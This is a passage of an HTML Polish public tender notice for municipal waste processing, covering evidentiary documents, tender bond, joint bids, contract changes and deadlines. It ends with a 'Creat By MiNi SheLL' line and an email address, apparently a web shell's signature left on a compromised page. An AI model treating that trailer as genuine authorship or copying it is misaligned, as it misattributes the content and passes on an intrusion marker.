Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>6) zezwolenie na zbieranie wszystkich frakcji odpadów komunalnych będących przedmiotem umowy (wg. kodów wskazanych w<br/>OPZ) wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (tekst jedn. Dz. U. z 2022 r., poz. 699) lub zezwolenie na<br/>przetwarzanie wszystkich frakcji odpadów komunalnych będących przedmiotem umowy (wg. kodów wskazanych w OPZ) lub<br/>pozwolenie zintegrowane/pozwolenie wydane na podstawie ustawy z dnia 27 kwietnia 2001 r. Prawo Ochrony Środowiska (t.j. Dz.<br/>U. z 2021 r., poz. 1973 ze zm.) uwzględniające warunki zezwolenia na zbieranie wszystkich frakcji odpadów komunalnych będących<br/>przedmiotem umowy (wg. kodów wskazanych w OPZ) - w instalacji stanowiącej miejsce przetwarzania przyjętych odpadów<br/>komunalnych),<br/>7) oświadczenia w zakresie niepodlegania wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego –<br/>załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Certyfikaty potwierdzające, że w każdej instalacji w której będzie następować przetwarzanie przyjmowanych od<br/>Zamawiającego odpadów komunalnych (wskazanych w ofercie) wdrożone są systemy zarządzania spełniające:<br/>a) normę środowiskową ISO 140001:2015 albo normę równoważną,<br/>b) normę jakościową ISO 9001:2015 albo normę równoważną. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. W związku z art. 107 ust. 2 ustawy PZP, zamawiający informuje, że w sytuacji, gdy wykonawca nie złożył przedmiotowych<br/>środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wezwie do ich złożenia<br/>lub uzupełnienia w wyznaczonym terminie.<br/>2. Zgodnie z art. 107 ust. 3 ustawy Pzp, powyższe nie będzie miało zastosowania, gdy pomimo złożenia przedmiotowego<br/>środka dowodowego, oferta podlegałaby odrzuceniu albo zaszłyby przesłanki unieważnienia postępowania.<br/>3. Zgodnie z art. 107 ust. 4 ustawy Pzp, zamawiający może żądać od wykonawców wyjaśnień dotyczących treści<br/>przedmiotowych środków dowodowych.<br/>4. Również, zgodnie z art. 223 ust. 1 ustawy Pzp, zamawiający może żądać od wykonawców wyjaśnień dotyczących treści<br/>złożonych ofert oraz przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia przed upływem terminu składania ofert wadium w wysokości 10 000,00 zł<br/>(słownie: dziesięć tysięcy złotych 00/100 );<br/>2. Forma wadium:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Zamawiający działając w trybie art. 60 pkt 1) PZP<br/>zastrzega obowiązek osobistego wykonania usługi przetwarzania niesegregowanych (zmieszanych) odpadów komunalnych<br/>przez tego wykonawcę / tych wykonawców, który / którzy są operatorami instalacji komunalnej przeznaczonej do realizacji<br/>zamówienia oraz wpisanej / wpisanymi na listę prowadzoną przez właściwego miejscowo marszałka województwa<br/>(obowiązek wpisu na listę nie znajduje zastosowania do instalacji przeznaczonej do termicznego przekształcania odpadów<br/>komunalnych zgodnie z przepisami u.o. oraz ustawy z dnia z dnia 23 września 1996 r. o utrzymaniu czystości i porządku w<br/>gminach tj. Dz. U. z 2022 r. poz. 1297 lub instalacji znajdujących się poza granicami Rzeczypospolitej Polskiej).<br/>2. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Dokument pełnomocnictwa powinien:<br/>1) określać postępowanie o udzielenie zamówienia, którego dotyczy,<br/>2) wymieniać Wykonawców ubiegających się wspólnie o udzielenie zamówienia mocodawców),<br/>3) określać osobę pełnomocnika oraz zakres jego umocowania.<br/>4. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie<br/>publiczne.<br/>5. Pełnomocnictwo powinno zostać złożone w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym.<br/>W przypadku gdy oryginalne pełnomocnictwo, zostało sporządzone jako dokument w postaci papierowej i opatrzone<br/>własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu poprzednim dokonuje<br/>mocodawca.<br/>6. Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako pełnomocnik, na adres<br/>wskazany do korespondencji.<br/>7. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie znajdujących zastosowanie w Postępowaniu przesłanek wykluczenia.<br/>8. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności lub braku<br/>przynależności do tej samej grupy kapitałowej, o którym mowa w § 1 ust. 1 pkt 2 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy, Dz.U.<br/>z 2020 r. poz. 2415, składa każdy z Wykonawców - Załącznik nr 5 do SWZ - Oświadczenie w sprawie przynależności do tej<br/>samej grupy kapitałowej.<br/>9. Wykonawcy wspólnie ubiegający się o zamówienie, w sytuacjach o których mowa w art. 117 ust. 4 ustawy P.z.p. do oferty<br/>załączają oświadczenie o którym mowa w tym przepisie.<br/>10. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia zostanie wybrana,<br/>Wykonawcy zobowiązani są przedłożyć Zamawiającemu przed zawarciem umowy w sprawie niniejszego zamówienia,<br/>umowę regulującą swoją współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza wprowadzanie zmian w zakresie Umowy zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień<br/>publicznych:<br/>1) w przypadku zmiany przepisów, w tym wynikających z aktów prawa miejscowego, normujących wykonanie przedmiotu<br/>zamówienia - sposób spełnienia świadczenia zostanie zmieniony na zgodny z obowiązującymi przepisami w tym zakresie,<br/>2) poprzez wyłączenie korzystania z konkretnego podwykonawcy, wprowadzenie nowego podwykonawcy lub zastąpienie<br/>podwykonawcy innym podwykonawcą,<br/>3) poprzez zmianę miejsca przekazywania odpadów lub miejsca w którym następuje proces przetwarzania odpadów, o<br/>którym mowa odpowiednio w § 1 ust. 1 i ust. 2 umowy – w takim przypadku Wykonawca zobowiązany jest wskazać miejsce,<br/>które spełnia wymagania określone w dokumentach zamówienia. Zmiana nie może skutkować zwiększeniem kosztów<br/>realizacji zamówienia dla Zamawiającego,<br/>4) poprzez zmianę terminu rozpoczęcia realizacji zamówienia, w szczególności w przypadku, jeżeli okres prowadzenia<br/>postępowania o udzielenie zamówienia publicznego uniemożliwia rozpoczęcie realizacji zamówienia w terminie<br/>wynikającym ze wzoru umowy,<br/>5) poprzez zmianę kodów odpadów bez dokonywania zmiany ich oznaczenia opisowego, w szczególności w przypadku<br/>zmiany przepisów prawa, które stanowią podstawę nadania odpadom określonych kodów,<br/>6) poprzez doprecyzowanie oznaczenia opisowego frakcji odpadów, których zagospodarowanie stanowi przedmiot umowy,<br/>7) poprzez zmianę rodzaju odpadów stanowiących przedmiot zamówienia,<br/>w szczególności w przypadku powstania po stronie Zamawiającego obowiązku zapewnienia zagospodarowania innych<br/>frakcji odpadów, niż przewidziane zamówieniem,<br/>2. Wszelkie zmiany do niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>3. W trakcie trwania niniejszej umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o:<br/>1) zmianie siedziby lub nazwy firmy,<br/>2) zmianie osób reprezentujących,<br/>3) ogłoszeniu upadłości,<br/>4) ogłoszeniu likwidacji,<br/>5) zawieszeniu działalności,<br/>6) wszczęciu postępowania na podstawie ustawy prawo restrukturyzacyjne, w którym uczestniczy Wykonawca. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kotlin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com